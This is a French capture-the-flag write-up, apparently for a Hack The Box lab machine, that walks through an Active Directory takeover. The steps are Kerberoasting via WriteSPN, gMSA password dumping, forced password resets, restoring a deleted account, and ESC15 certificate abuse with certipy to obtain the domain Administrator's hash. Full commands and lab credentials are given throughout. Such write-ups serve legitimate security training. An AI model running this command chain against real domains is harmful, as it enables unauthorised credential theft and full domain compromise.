Accueil
Write-up
TombWatcher
Février 2026
--- ## Résumé La machine s'est déroulée en trois phases majeures : 1. **Compromission initiale et Mouvements latéraux :** Exploitation d'une chaîne de mauvaises configurations de permissions, incluant du Kerberoasting (via *WriteSPN*), l'abus de groupes, et la compromission d'un compte de service gMSA. 2. **Fouille de l'historique AD (Tombstone) :** Restauration d'un compte à privilèges supprimé. 3. **Compromission du Domaine :** Abus des services de certificats Active Directory (AD CS) via la vuln **ESC15** sur le compte restauré, permettant d'usurper l'identité de l'Administrateur du domaine. --- ## 1. Reconnaissance On commence avec un scan Nmap sur l'IP `10.129.232.167`. On repère les ports d'un contrôleur de domaine (DNS, Kerberos, RPC, LDAP, SMB). On a un compte de base pour démarrer : `henry` avec le mot de passe `H3nry_987TGV!`. Je lance NetExec (`nxc smb`) pour énumérer les users du domaine `tombwatcher.htb`, et on trouve une petite liste : Henry, Alfred, sam et john. ```bash nxc smb "DC01.tombwatcher.htb" -u 'henry' -p 'H3nry_987TGV!' --users ``` ## 2. Premier flag : BloodHound & Kerberoasting J'utilise `rusthound` pour récupérer un zip à importer sur Bloodhound. ```bash rusthound -d "tombwatcher.htb" -u "henry" -p 'H3nry_987TGV!' --zip --ldaps --adcs --old-bloodhound ``` <figure> <img src="../assets/img/tombwatcher/1.png" alt="Commande rusthound" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Capture+Rusthound]'"> <figcaption>Execution de la commande rusthound</figcaption> </figure> En regardant le graphe de notre user `henry`, on voit qu'il a les droits **WriteSPN** sur l'utilisateur `Alfred`. <figure> <img src="../assets/img/tombwatcher/3.png" alt="Henry a les droits WriteSPN sur Alfred" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Graphe+Bloodhound]'"> <figcaption>Henry a les droits WriteSPN sur Alfred</figcaption> </figure> On va lui écrire un faux SPN pour pouvoir le Kerberoast juste après. J'utilise `bloodyAD` pour set le SPN : <figure> <img src="../assets/img/tombwatcher/8.png" alt="Commande pour set le SPN de Alfred" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Commande+BloodyAD]'"> <figcaption>Commande pour set le SPN de Alfred</figcaption> </figure> ```bash bloodyAD --host 10.129.232.167 -u 'henry' -p 'H3nry_987TGV!' set object alfred servicePrincipalName -v 'fake/spn' ``` *(Petite astuce : j'avais le problème `Clock skew too great` avec Exegol, donc j'ai utilisé `faketime` pour me sync avec l'horloge du DC).* Une fois sync, je lance `GetUserSPNs.py` et je récupère le hash d'Alfred. <figure> <img src="../assets/img/tombwatcher/9.png" alt="Récupération du hash d'Alfred" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Hash+Alfred]'"> <figcaption>Récupération du hash d'Alfred</figcaption> </figure> Je lance Hashcat avec rockyou.txt, et voici le mot de passe : `basketball`. <figure> <img src="../assets/img/tombwatcher/5.png" alt="Utilisation de Hashcat pour cracker le hash d'Alfred" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Cracking+Hashcat]'"> <figcaption>Utilisation de Hashcat pour cracker le hash d'Alfred</figcaption> </figure> ## 3. Mouvements Latéraux À partir de là, on enchaîne les abus d'ACEs pour remonter jusqu'à l'utilisateur `john`. **Étape 1 : Alfred ➔ ansible_dev$** Alfred a le droit **AddSelf** sur le groupe `Infrastructure`. Ce groupe a le droit de lire le mot de passe du compte de service GMSA `ansible_dev$\` (**ReadGMSAPassword**). * Je m'ajoute au groupe avec : `bloodyAD --host "10.129.232.167" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "Infrastructure" "alfred"` * J'utilise `gMSADumper.py` et je récupère le hash NT de `ansible_dev$` : `93f81a98d22217b6206d950528a4802e`. <figure> <img src="../assets/img/tombwatcher/10.png" alt="Utilisation de gMSADumper pour récupérer le hash de ansible_dev$" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[GMSADumper]'"> <figcaption>Utilisation de gMSADumper pour récupérer le hash de ansible_dev$</figcaption> </figure> **Étape 2 : ansible_dev$ ➔ sam** Le compte GMSA a le droit **ForceChangePassword** sur l'user `sam`. * J'utilise encore `bloodyAD` pour forcer le mot de passe de `sam` en `Pwnd123!`. `bloodyAD --host "10.129.232.167" -d "tombwatcher.htb" -u "ansible_dev$" -p ":93f81a98d22217b6206d950528a4802e" set password "sam" 'Pwnd123!'` <figure> <img src="../assets/img/tombwatcher/11.png" alt="Vérification du changement de mot de passe" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Password+Change]'"> <figcaption>Vérification du changement de mot de passe</figcaption> </figure> **Étape 3 : sam ➔ john (User Flag)** `sam` peut modifier l'owner de `john` (**ChangeOwner**). * Je change l'owner avec le SID de sam. `bloodyAD --host "10.129.232.167" -d "tombwatcher.htb" -u "sam" -p 'Pwnd123!' set owner "john" "S-1-5-21-3623811015-3361044348-30300820-1013"` * Ensuite, je me mets les droits **GenericAll** sur `john`. `bloodyAD --host "10.129.232.167" -d "tombwatcher.htb" -u "sam" -p 'Pwnd123!' set object john genericAll` * Et, je change le mot de passe de `john` en `Pwnd123!`. Connexion avec `evil-winrm`, et on a le premier flag ! <figure> <img src="../assets/img/tombwatcher/user.png" alt="Connexion avec evil-winrm et récupération du premier flag" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[User+Flag]'"> <figcaption>Connexion avec evil-winrm et récupération du premier flag</figcaption> </figure> ## 4. Road to Root : Tombstone ADCS ESC15 Le nom de la box me faisait penser à la "Tombstone" de l'AD (qui stocke les objets supprimés). J'ai cherché avec `Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -Properties givenName, LastKnownParent` et j'ai trouvé trois users nommés `cert_admin`. <figure> <img src="../assets/img/tombwatcher/12.png" alt="Enumération des objets supprimés avec PowerView" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Tombstone+Enumeration]'"> <figcaption>Enumération des objets supprimés avec PowerView</figcaption> </figure> En fouillant les ACLs de `john` avec PowerView, j'ai vu qu'il avait les droits **GenericAll** sur l'OU `ADCS`. <figure> <img src="../assets/img/tombwatcher/13.png" alt="Enumération des ACLs de john" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[ACL+Enumeration]'"> <figcaption>Enumération des ACLs de john</figcaption> </figure> Donc nous avons tous les éléments pour la suite : 1. On restaure l'un des comptes `cert_admin` depuis les objets supprimés : ```powershell Restore-ADObject -Identity "938182c3-bf0b-410a-9aaa-45c8e1a02ebf" ``` 2. ET on lui set un mot de passe (`Pwnd123!`) avec bloodyAD. Puisque le compte s'appelle `cert_admin`, c'est surement une attaque ADCS, je lance `certipy find -u 'cert_admin@tombwatcher.htb' -p 'Pwnd123!' -dc-ip '10.129.232.167' -vulnerable -stdout` et : il y a la vuln **ESC15** sur le template `WebServer`. <figure> <img src="../assets/img/tombwatcher/14.png" alt="Vulnérabilité ESC15 détectée par Certipy" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Certipy+ESC15]'"> <figcaption>Vulnérabilité ESC15 détectée par Certipy template WebServer</figcaption> </figure> Les 3 étapes de l'ESC15 avec Certipy : **1. Récupérer un certificat "Agent" :** On demande un certificat pour cert_admin en spécifiant l'OID du Certificate Request Agent (1.3.6.1.4.1.311.20.2.1) dans les Application Policies. Grâce à ce rôle, on peut maintenant demander le certificat de n'importe quel user. ```bash certipy req -u 'cert_admin@tombwatcher.htb' -p 'Pwnd123!' -application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'tombwatcher-CA-1' -template 'WebServer' -dc-ip 10.129.232.167 ``` <figure> <img src="../assets/img/tombwatcher/certipy1.png" alt="demande de certificat pour cert_admin" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Certipy+Req+1]'"> <figcaption>Demande de certificat avec EKU "Certificate Request Agent"</figcaption> </figure> **2. Demander un certificat au nom de l'Admin :** Maintenant, je demande un certificat pour l'Administrateur du domaine. ```bash certipy req -u 'cert_admin@tombwatcher.htb' -p 'Pwnd123!' -on-behalf-of 'tombwatcher\administrator' -template User -ca 'tombwatcher-CA-1' -pfx cert_admin.pfx -dc-ip 10.129.232.167 ``` <figure> <img src="../assets/img/tombwatcher/certipy2.png" alt="demande de certificat pour l'Admin" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Certipy+Req+2]'"> <figcaption>Demande de certificat avec EKU "Certificate Request Agent" pour l'admin</figcaption> </figure> **3. Récupérer le hash NT de l'Admin :** On s'authentifie avec le `.pfx` pour récupérer le hash NT de l'admin. ```bash certipy auth -pfx administrator.pfx -dc-ip 10.129.232.167 ``` <figure> <img src="../assets/img/tombwatcher/certipy3.png" alt="Récupération du hash NT de l'Admin" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Certipy+Auth]'"> <figcaption>Récupération du hash NT de l'Admin</figcaption> </figure> Le hash NT de l'Admin : `f61db423bebe3328d33af26741afe5fc`. On peut maintenant se connecter avec `evil-winrm` sur le compte Administrator. <figure> <img src="../assets/img/tombwatcher/root.png" alt="Récupération du dernier flag" onerror="this.src='https://via.placeholder.com/800x400/0b0e14/9fef00?text=[Root+Flag]'"> <figcaption>Récupération du dernier flag</figcaption> </figure> --- ## Conclusion J'ai bien aimé cette box qui m'a permis de découvrir l'outil certipy, et de me familiariser avec les attaques ADCS.
